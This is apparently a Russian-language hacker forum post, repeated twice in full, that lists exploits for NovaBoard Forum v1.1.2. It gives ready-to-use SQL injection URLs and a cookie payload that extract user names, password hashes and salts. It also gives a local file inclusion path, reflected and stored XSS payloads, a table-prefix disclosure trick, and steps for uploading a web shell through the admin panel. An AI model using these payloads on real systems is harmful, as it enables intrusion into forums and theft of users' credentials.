RulleR
05.01.2010, 17:20
Обзор уязвимостей NovaBoard Forum
Official site: www.novaboard.net ( http://www.novaboard.net)
Latest release: NovaBoard v1.1.2
------------------------------------------------------------------------------
Default table prefix: novaboard_
Table with users: members
Columns:|id|name|usertitle|email|role|password|pas sword_time|pass_salt|theme|board_lang|time_offset| read_all_posts|avatar|remote_avatar|signature|loca tion|nationality|msn|aol|yahoo|skype|xbox|wii|ps3| last_online|warn_level|suspend_date|whiteboard|reg ister_date|verified|user_posts|banned|new_pms|allo w_admin_email|moderate|subscribe_pm|never_spam|А горитм хэширования паролей:
// Generate salt...
$salt = substr(md5(uniqid(rand(), true)), 0, 9);
// Salt the password
$password= md5($password . $salt);
------------------------------------------------------------------------------
SQL injection
#1
Vuln file: /includes/pages/search.php
/*...*/
$forum=implode(",",$_GET['forums']);
$forum = htmlentities($forum);
$forum = escape_string($forum);
/*...*/
$sql989 = "SELECT MEMBER, TIME, TOPIC_ID, FORUM_ID, CONTENT, ID, EDIT_TIME, EDIT_MEMBER, MATCH(TITLE, DESCRIPTION, CONTENT) AGAINST ('*$searchstring*' IN BOOLEAN MODE) AS score FROM {$db_prefix}posts WHERE FORUM_ID IN($forum) AND TIME >= '$startdate' AND TIME <= '$enddate' AND MEMBER='$id' AND APPROVED='1' AND MATCH(TITLE, DESCRIPTION, CONTENT) AGAINST ('*$searchstring*' IN BOOLEAN MODE) ORDER BY score DESC";
}
/*...*/
Exploit:http://[host]/[path]/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)+union+select+null,null,null,5,concat_ws(0x3a,n ame,password,pass_salt),null,null,null,null+from+[prefix]members+where+id=1+--+
#2
Vuln file: /includes/forums/addreply.php
if ($_COOKIE['mqpid']!=''){
$array=array($_COOKIE['mqpid']);
$array = implode(",",$array);
$quote="";
$query217 = "select MEMBER, CONTENT, TOPIC_ID, ID from {$db_prefix}posts WHERE ID IN($array) ORDER BY ID desc";
$result217 = mysql_query($query217) or die("addreply.php - Error in query: $query217") ;
Need: user account
Exploit:GET http://[host]/[path]/index.php?func=addreply&topic=1 HTTP/1.0
Cookie: mqpid=1) union select null,concat_ws(0x3a,name,password,pass_salt),null, null from [prefix]members where id=1/*
#3
Vuln file: /includes/header.php/*...*/
if (isset($_GET['topic']) && ($_GET['page']!='search')){
$location_text="";
$query211 = "select CONTENT from {$db_prefix}posts WHERE TOPIC_ID='$topic' AND TITLE!=''";
$result211 = mysql_query($query211) or die("topic.php - Error in query: $query211");
/*...*/
Need: magic_quotes = OFF
Exploit:http://[host]/[path]/index.php?page=list&forum=1&topic=xek'+union+select+concat_ws(0x3a,name,passwo rd,pass_salt)+from+[prefix]members+where+id=1+--+Note: Вывод ищем в исходном коде страницы:<meta name="description" content="{login:hash:salt}" />
Local File Inclusion
Vuln file: /includes/structure.php
/*...*/
$page = escape_string($_GET['page']);
/*...*/
if (file_exists("themes/$theme/includes/pages/$page.php")){
include "themes/$theme/includes/pages/$page.php";
}
elseif (include("includes/pages/$page.php")){
}
/*...*/Exploit:
http://[host]/[path]/index.php?page=../../downloadNote: null byte экранируется...
Active XSS
Exploit:javascript:alert(1)Note: уязвимость в add reply
Passive XSS
Exploit:
http://[host]/[path]/index.php?page=search&search=xek&topic=1"><script>alert(1)</script>
http://[host]/[path]/index.php?page=search&search=xek&author_id=1"><script>alert(1)</script>
http://[host]/[path]/index.php?page=search&search=xek&author=1"><script>alert(1)</script>
http://[host]/[path]/index.php?page=search&search=xek&startdate=1"><script>alert(1)</script>
http://[host]/[path]/index.php?page=search&search=xek&enddate=1"><script>alert(1)</script>
XSS in URI
Exploit:http://[host]/[path]/index.php/"><script>alert(1)</script>
Disclosure of Table Prefix
Exploit:http://[host]/[path]/index.php?topic=1&limit=xNote: на это форум выдаст примерно такую ошибку:
topic.php - Error in query: select MEMBER, TIME, FORUM_ID, CONTENT, ID, EDIT_TIME, EDIT_MEMBER, EDIT_REASON, TITLE, DESCRIPTION, STICKY, ANNOUNCE, REPORTED, APPROVED from novaboard_posts WHERE TOPIC_ID='1' AND APPROVED='1' ORDER BY TIME asc LIMIT -30, 30
------------------------------------------------------------------------------
Upload shell from Admin CP
Пакуем шелл winzip'ом
Далее переходим в Admin CP --> Board Settings --> Modules Settings
аплодим наш чудо-модуль..
Шелл будет находиться в /modules/[name_shell].php
Таким же способом можно залить через Themes Settings
шелл будет в папке themes
------------------------------------------------------------------------------
P.S. все найденные уязвимости тестировались на NovaBoard v1.1.2. Есть большая вероятность что эти уязвимости будут работать и на более ранних версиях.
Official site: www.novaboard.net ( http://www.novaboard.net)
Latest release: NovaBoard v1.1.2
------------------------------------------------------------------------------
Default table prefix: novaboard_
Table with users: members
Columns:|id|name|usertitle|email|role|password|pas sword_time|pass_salt|theme|board_lang|time_offset| read_all_posts|avatar|remote_avatar|signature|loca tion|nationality|msn|aol|yahoo|skype|xbox|wii|ps3| last_online|warn_level|suspend_date|whiteboard|reg ister_date|verified|user_posts|banned|new_pms|allo w_admin_email|moderate|subscribe_pm|never_spam|А горитм хэширования паролей:
// Generate salt...
$salt = substr(md5(uniqid(rand(), true)), 0, 9);
// Salt the password
$password= md5($password . $salt);
------------------------------------------------------------------------------
SQL injection
#1
Vuln file: /includes/pages/search.php
/*...*/
$forum=implode(",",$_GET['forums']);
$forum = htmlentities($forum);
$forum = escape_string($forum);
/*...*/
$sql989 = "SELECT MEMBER, TIME, TOPIC_ID, FORUM_ID, CONTENT, ID, EDIT_TIME, EDIT_MEMBER, MATCH(TITLE, DESCRIPTION, CONTENT) AGAINST ('*$searchstring*' IN BOOLEAN MODE) AS score FROM {$db_prefix}posts WHERE FORUM_ID IN($forum) AND TIME >= '$startdate' AND TIME <= '$enddate' AND MEMBER='$id' AND APPROVED='1' AND MATCH(TITLE, DESCRIPTION, CONTENT) AGAINST ('*$searchstring*' IN BOOLEAN MODE) ORDER BY score DESC";
}
/*...*/
Exploit:http://[host]/[path]/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)+union+select+null,null,null,5,concat_ws(0x3a,n ame,password,pass_salt),null,null,null,null+from+[prefix]members+where+id=1+--+
#2
Vuln file: /includes/forums/addreply.php
if ($_COOKIE['mqpid']!=''){
$array=array($_COOKIE['mqpid']);
$array = implode(",",$array);
$quote="";
$query217 = "select MEMBER, CONTENT, TOPIC_ID, ID from {$db_prefix}posts WHERE ID IN($array) ORDER BY ID desc";
$result217 = mysql_query($query217) or die("addreply.php - Error in query: $query217") ;
Need: user account
Exploit:GET http://[host]/[path]/index.php?func=addreply&topic=1 HTTP/1.0
Cookie: mqpid=1) union select null,concat_ws(0x3a,name,password,pass_salt),null, null from [prefix]members where id=1/*
#3
Vuln file: /includes/header.php/*...*/
if (isset($_GET['topic']) && ($_GET['page']!='search')){
$location_text="";
$query211 = "select CONTENT from {$db_prefix}posts WHERE TOPIC_ID='$topic' AND TITLE!=''";
$result211 = mysql_query($query211) or die("topic.php - Error in query: $query211");
/*...*/
Need: magic_quotes = OFF
Exploit:http://[host]/[path]/index.php?page=list&forum=1&topic=xek'+union+select+concat_ws(0x3a,name,passwo rd,pass_salt)+from+[prefix]members+where+id=1+--+Note: Вывод ищем в исходном коде страницы:<meta name="description" content="{login:hash:salt}" />
Local File Inclusion
Vuln file: /includes/structure.php
/*...*/
$page = escape_string($_GET['page']);
/*...*/
if (file_exists("themes/$theme/includes/pages/$page.php")){
include "themes/$theme/includes/pages/$page.php";
}
elseif (include("includes/pages/$page.php")){
}
/*...*/Exploit:
http://[host]/[path]/index.php?page=../../downloadNote: null byte экранируется...
Active XSS
Exploit:javascript:alert(1)Note: уязвимость в add reply
Passive XSS
Exploit:
http://[host]/[path]/index.php?page=search&search=xek&topic=1"><script>alert(1)</script>
http://[host]/[path]/index.php?page=search&search=xek&author_id=1"><script>alert(1)</script>
http://[host]/[path]/index.php?page=search&search=xek&author=1"><script>alert(1)</script>
http://[host]/[path]/index.php?page=search&search=xek&startdate=1"><script>alert(1)</script>
http://[host]/[path]/index.php?page=search&search=xek&enddate=1"><script>alert(1)</script>
XSS in URI
Exploit:http://[host]/[path]/index.php/"><script>alert(1)</script>
Disclosure of Table Prefix
Exploit:http://[host]/[path]/index.php?topic=1&limit=xNote: на это форум выдаст примерно такую ошибку:
topic.php - Error in query: select MEMBER, TIME, FORUM_ID, CONTENT, ID, EDIT_TIME, EDIT_MEMBER, EDIT_REASON, TITLE, DESCRIPTION, STICKY, ANNOUNCE, REPORTED, APPROVED from novaboard_posts WHERE TOPIC_ID='1' AND APPROVED='1' ORDER BY TIME asc LIMIT -30, 30
------------------------------------------------------------------------------
Upload shell from Admin CP
Пакуем шелл winzip'ом
Далее переходим в Admin CP --> Board Settings --> Modules Settings
аплодим наш чудо-модуль..
Шелл будет находиться в /modules/[name_shell].php
Таким же способом можно залить через Themes Settings
шелл будет в папке themes
------------------------------------------------------------------------------
P.S. все найденные уязвимости тестировались на NovaBoard v1.1.2. Есть большая вероятность что эти уязвимости будут работать и на более ранних версиях.